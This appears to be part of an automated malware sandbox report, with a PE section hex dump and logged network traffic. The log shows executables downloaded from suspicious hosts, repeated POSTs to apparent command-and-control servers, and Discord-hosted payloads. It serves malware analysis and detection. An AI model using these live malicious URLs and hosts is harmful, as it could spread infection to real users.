00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49835 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /263873486.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: iyc.jelikob.ru
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://agvlhndt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dyrgluo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctwwxytaud.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wpicrcm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fklpf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bxdspskl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://isiuwvkkoj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pmdvv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jyoho.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fpdmgcvxb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxurvqy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vlsulvkdg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cwdaqy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://llaraxn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jibms.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mowuyooy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://okikkrhv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pjlnqmhpvc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hcgnyqptt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ithapmr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gauqw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vqosa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kdacdmichm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fsluxk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dpiqpnl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tysqt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dhskdgpx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oihlnqbyqp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xbtscsiiqr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fchldji.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://narjywxfra.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pkxhixnn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xjjqkp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sqgxbwy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yvrtx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vyivfmetg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wdgyfowqds.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: nusurtal4f.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49854 -> 93.115.20.139:28978
Source: FC0C.exe.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 3AE.exe.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: FC0C.exe.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: D083.exe, 0000002B.00000002.716245668.0000000000F31000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: AdvancedRun.exe.19.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: AdvancedRun.exe.19.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 3AE.exe.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: FC0C.exe.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 3AE.exe.6.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: FC0C.exe.6.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: FC0C.exe.6.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 3AE.exe.6.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: FC0C.exe.6.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: AdvancedRun.exe.19.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: AdvancedRun.exe.19.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: FC0C.exe.6.dr String found in binary or memory: http://fontello.com
Source: FC0C.exe.6.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: 3AE.exe.6.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: FC0C.exe.6.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: AdvancedRun.exe.19.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: 60DF.exe, 00000018.00000000.509231538.0000000000442000.00000002.00020000.sdmp, 60DF.exe.6.dr String found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
Source: explorer.exe, 00000006.00000000.393764920.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: FC0C.exe.6.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: AdvancedRun.exe, AdvancedRun.exe, 0000001C.00000002.528560998.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000021.00000002.570535756.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000024.00000000.565833998.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.19.dr String found in binary or memory: http://www.nirsoft.net/
Source: sqlite3.dll.29.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 1xVPfvJcrg.29.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: DataSvcUtil.exe, 00000022.00000000.568099425.0000000000402000.00000040.00000001.sdmp, SMSvcHost.exe, 0000002A.00000002.634272090.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: 60DF.exe, 00000018.00000000.509231538.0000000000442000.00000002.00020000.sdmp, 60DF.exe.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
Source: 60DF.exe, 00000018.00000000.509231538.0000000000442000.00000002.00020000.sdmp, 60DF.exe.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
Source: D083.exe.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903196811345395712/6058E8D5.jpg
Source: 3FD8.exe, 00000015.00000000.493097245.00000000002F2000.00000002.00020000.sdmp, 3FD8.exe.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903333369742491648/1E88D378.jpg
Source: 37D8.exe.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpg
Source: 37D8.exe.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpg
Source: FC0C.exe.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903579324031074365/ECF88C37.jpg
Source: 1xVPfvJcrg.29.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1xVPfvJcrg.29.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1xVPfvJcrg.29.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1xVPfvJcrg.29.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 1xVPfvJcrg.29.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1xVPfvJcrg.29.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: AdvancedRun.exe.19.dr String found in binary or memory: https://sectigo.com/CPS0C
Source: AdvancedRun.exe.19.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: FC0C.exe.6.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 1xVPfvJcrg.29.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: xacokuo8.top
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /263873486.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: iyc.jelikob.ru
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903333369742491648/1E88D378.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: GET //l/f/UJ1rynwB3dP17Spz23JR/c8a165d96af5f02e4cac679a1908533dbdcac0e8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 29 Oct 2021 15:55:28 GMTContent-Type: text/htmlContent-Length: 797Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:54:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f1 11 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:54:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 